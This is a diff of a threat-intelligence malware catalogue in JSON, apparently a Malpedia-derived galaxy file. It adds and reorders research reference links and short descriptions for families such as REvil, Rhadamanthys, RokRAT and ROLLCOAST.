+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/",
+ "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/",
+ "https://www.flashpoint-intel.com/blog/chatter-indicates-blackmatter-as-revil-successor/",
+ "https://storage.courtlistener.com/recap/gov.uscourts.txnd.351760/gov.uscourts.txnd.351760.1.0_3.pdf",
+ "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
"https://www.youtube.com/watch?v=tZVFMVm5GAk",
- "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/"
+ "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
+ "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/",
+ "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045",
+ "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
+ "https://ke-la.com/will-the-revils-story-finally-be-over/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/",
+ "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html",
+ "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/",
+ "https://securelist.com/sodin-ransomware/91473/",
+ "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/",
+ "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
+ "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
+ "https://asec.ahnlab.com/ko/19860/",
+ "https://securityintelligence.com/posts/sodinokibi-revil-ransomware-disrupt-trade-secrets/",
+ "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware",
+ "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
+ "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
+ "https://analyst1.com/file-assets/History-of-REvil.pdf",
+ "https://twitter.com/_alex_il_/status/1412403420217159694",
+ "https://twitter.com/svch0st/status/1411537562380816384",
+ "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20",
+ "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html",
+ "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/",
+ "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-southfield",
+ "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
+ "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
+ "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
+ "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html",
+ "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://blog.amossys.fr/sodinokibi-malware-analysis.html",
+ "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
+ "https://www.digitalshadows.com/blog-and-research/revil-analysis-of-competing-hypotheses/",
+ "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
+ "https://www.connectwise.com/resources/revil-profile",
+ "https://isc.sans.edu/diary/27012",
+ "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states",
+ "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs"
],
"synonyms": [
"Sodin",
@@ -39558,16 +41635,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor",
- "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
"https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf",
- "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
"https://www.secureworks.com/research/threat-profiles/cobalt-lyceum",
"https://www.secureworks.com/research/threat-profiles/cobalt-gypsy",
- "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
- "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran",
+ "https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf",
+ "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/",
"https://drive.google.com/file/d/1oA4YSwXLxEF-EXJcrM76Bc4_7ZfBGYE4/view",
+ "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/",
+ "https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/",
"https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
- "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/"
+ "https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran"
],
"synonyms": [],
"type": []
@@ -39575,6 +41652,26 @@
"uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
"value": "RGDoor"
},
+ {
+ "description": "According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.\r\n\r\nAt the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys",
+ "https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web",
+ "https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/",
+ "https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88",
+ "https://www.malware-traffic-analysis.net/2023/01/03/index.html",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023",
+ "https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/",
+ "https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "50d322d7-c7e0-4d9b-9996-e5767caa8f1c",
+ "value": "Rhadamanthys"
+ },
{
"description": "Ransomware.",
"meta": {
@@ -39606,8 +41703,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof",
- "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/",
"https://blog.avast.com/rietspoof-malware-increases-activity",
+ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/",
"https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/"
],
"synonyms": [],
@@ -39621,8 +41718,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://global.ahnlab.com/global/upload/download/techreport/[AhnLab]Andariel_a_Subgroup_of_Lazarus%20(3).pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/"
],
"synonyms": [],
@@ -39671,14 +41768,27 @@
"uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
"value": "Ripper ATM"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro",
+ "https://blog.sekoia.io/new-risepro-stealer-distributed-by-the-prominent-privateloader/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "20ba0ede-454c-461d-a0e1-c053a838faa2",
+ "value": "RisePro"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun",
+ "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/",
"https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
- "https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf"
],
"synonyms": [],
@@ -39692,7 +41802,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3",
- "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/"
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://twitter.com/URSNIFleak"
],
"synonyms": [],
"type": []
@@ -39705,14 +41816,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rms",
- "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
- "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/",
- "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
"https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/"
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
+ "https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution",
+ "https://blog.malwarebytes.com/threat-analysis/2017/09/cve-2017-0199-used-to-deliver-modified-rms-agent-rat/",
+ "https://blog.yoroi.company/research/ta505-is-expanding-its-operations/",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf"
],
"synonyms": [
"Gussdoor",
@@ -39728,25 +41839,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood",
- "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf",
- "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/",
- "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://goggleheadedhacker.com/blog/post/12",
"https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/",
"https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
"https://twitter.com/VK_Intel/status/1121440931759128576",
+ "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
"https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/",
"https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/",
- "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/",
- "https://goggleheadedhacker.com/blog/post/12",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/",
+ "https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/",
+ "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
+ "https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/",
"https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/"
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/",
+ "https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/"
],
"synonyms": [
"RobbinHood"
@@ -39775,10 +41886,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
- "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
"https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware",
"https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
@@ -39804,8 +41915,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin",
"https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"
],
@@ -39833,31 +41944,35 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
- "http://v3lo.tistory.com/24",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
- "https://unit42.paloaltonetworks.com/atoms/moldypisces/",
- "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/",
- "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
- "https://www.ibm.com/downloads/cas/Z81AVOY7",
- "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
- "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
- "https://www.youtube.com/watch?v=uoBQE5s2ba4",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
- "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48",
- "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/",
+ "http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
+ "https://asec.ahnlab.com/en/51751/",
+ "https://www.ibm.com/downloads/cas/Z81AVOY7",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "https://www.youtube.com/watch?v=uoBQE5s2ba4",
+ "http://v3lo.tistory.com/24",
+ "https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48",
+ "http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
+ "https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/",
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/",
+ "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf",
+ "https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
"https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection"
+ "https://twitter.com/ESETresearch/status/1575103839115804672",
+ "https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
+ "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
+ "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/",
+ "https://unit42.paloaltonetworks.com/atoms/moldypisces/",
+ "https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab"
],
"synonyms": [
"DOGCALL"
@@ -39867,6 +41982,23 @@
"uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
"value": "RokRAT"
},
+ {
+ "description": "ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast",
+ "https://www.mandiant.com/resources/sabbath-ransomware-affiliate"
+ ],
+ "synonyms": [
+ "Arcane",
+ "S4bb47h",
+ "Sabbath"
+ ],
+ "type": []
+ },
+ "uuid": "a3178bd5-719b-4065-9a55-d13bb34e5c14",
+ "value": "ROLLCOAST"
+ },
{
"description": "",
"meta": {
@@ -39887,6 +42019,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.romcom_rat",
+ "https://blogs.blackberry.com/en/2022/10/unattributed-romcom-threat-actor-spoofing-popular-apps-now-hits-ukrainian-militaries",
+ "https://blogs.blackberry.com/en/2022/11/romcom-spoofing-solarwinds-keepass",
+ "https://cert.gov.ua/article/3349703",
"https://unit42.paloaltonetworks.com/cuba-ransomware-tropical-scorpius/"
],
"synonyms": [],
@@ -39912,14 +42047,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rook",
- "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/",
- "https://seguranca-informatica.pt/rook-ransomware-analysis/",
"https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader",
"https://blog.cyble.com/2022/03/15/deep-dive-analysis-pandora-ransomware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/",
+ "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit/NightSky_Ransomware%E2%80%93just_a_Rook_RW_fork_in_VMProtect_suit.md",
"https://www.sentinelone.com/labs/new-rook-ransomware-feeds-off-the-code-of-babuk/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/"
+ "https://chuongdong.com/reverse%20engineering/2022/01/06/RookRansomware/",
+ "https://seguranca-informatica.pt/rook-ransomware-analysis/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
@@ -39939,6 +42074,38 @@
"uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9",
"value": "Roopirs"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy",
+ "https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "68050d50-eece-43ba-8668-0825eab940f0",
+ "value": "Roopy"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach",
+ "https://www.trendmicro.com/en_us/research/23/d/an-analysis-of-the-bablock-ransomware.html",
+ "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
+ "https://www.group-ib.com/blog/bablock-ransomware/",
+ "https://medium.com/@simone.kraus/rorschach-ransomware-analysis-with-attack-flow-7fa5ff613a75",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/d/an-analysis-of-the-bablock-ransomware-/iocs-an-analysis-of-the-babLock-ransomware.txt"
+ ],
+ "synonyms": [
+ "BabLock"
+ ],
+ "type": []
+ },
+ "uuid": "86c3434c-ca86-4109-b0fc-61d14d59505c",
+ "value": "Rorschach Ransomware"
+ },
{
"description": "",
"meta": {
@@ -39959,7 +42126,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.roshtyak",
- "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/"
+ "https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/",
+ "https://unit42.paloaltonetworks.com/unsigned-dlls/",
+ "https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html",
+ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/"
],
"synonyms": [],
"type": []
@@ -39972,8 +42142,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt",
- "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html",
- "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/"
+ "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/",
+ "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html"
],
"synonyms": [
"RotoCrypt",
@@ -39989,8 +42159,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rover",
- "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/"
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/"
],
"synonyms": [],
"type": []
@@ -40003,15 +42173,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix",
- "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf",
- "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
- "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
- "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
- "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
- "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
- "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
"https://securelist.com/oh-what-a-boot-iful-mornin/97365",
+ "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=981",
+ "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html",
+ "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html",
+ "https://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework-updated/",
+ "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
+ "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/",
+ "https://news.drweb.ru/?i=1772&c=23&lng=ru&p=0",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/",
"https://blogs.technet.microsoft.com/mmpc/2014/05/04/the-evolution-of-rovnix-new-virtual-file-system-vfs/"
],
@@ -40022,15 +42192,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "a4036a28-3d94-11e8-ad9f-97ada3c6d5fb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f",
"value": "Rovnix"
},
@@ -40040,22 +42201,13 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli",
"https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-palace",
"https://github.com/nccgroup/Royal_APT",
